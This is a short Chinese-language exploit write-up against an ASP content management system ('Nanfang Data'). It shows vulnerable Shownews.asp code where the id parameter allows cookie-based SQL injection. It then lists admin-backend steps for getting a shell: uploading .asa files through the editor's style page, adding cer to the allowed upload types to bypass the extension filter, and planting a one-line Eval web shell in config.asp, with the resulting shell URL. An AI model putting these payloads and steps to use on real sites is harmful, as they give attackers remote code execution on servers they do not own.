Author:mer4en7y
遇到了，蛋疼
Check_sql.asp:
'----- 对 get query 值 的过滤.
'-----对 post 表 单值的过滤.
对get、post方式进行了过滤

Shownews.asp:
<%
id=cstr(request("id"))
Set rsnews=Server.CreateObject("ADODB.RecordSet")
sql="update news set hits=hits+1 where id="&id
conn.execute sql
sql="select * from news where id="&owen
rsnews.Open sql,conn,1,1
title=rsnews("title")
if rsnews.eof and rsnews.bof then
response.Write("数据库出错")
else
%>
Id参数导致Cookie注入

后台拿shell(南方数据的一些方法):
1）编辑器拿shell:
访问http://www.2cto.com /SouthidcEditor/admin_style.asp
添加asa,上传
2）upfile_photo.asp
<!--#include file="Inc/config.asp"-->
….
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
                        EnableUpload=false
                end if
                if EnableUpload=false then
                        msg="这种文件类型不允许上传！\n\n只允许上传这几种文件类型：" & UpFileType
                        FoundErr=true
                end if
…..
其中：Config.asp:
Const SaveUpFilesPath="UploadFiles"        '存放上传文件的目录
Const UpFileType="gif|jpg|bmp|png|swf|doc|rar"        '允许的上传文件类型
Const DelUpFiles="Yes"        '删除文章时是否同时删除文章中的上传文件
我们可以在网站配置的地方增加cer等，完全可以绕过。
3）网站配置插入一句话
"%><%Eval(Request(“cmd”))%><%
一句话地址：http://www.2cto.com /inc/config.asp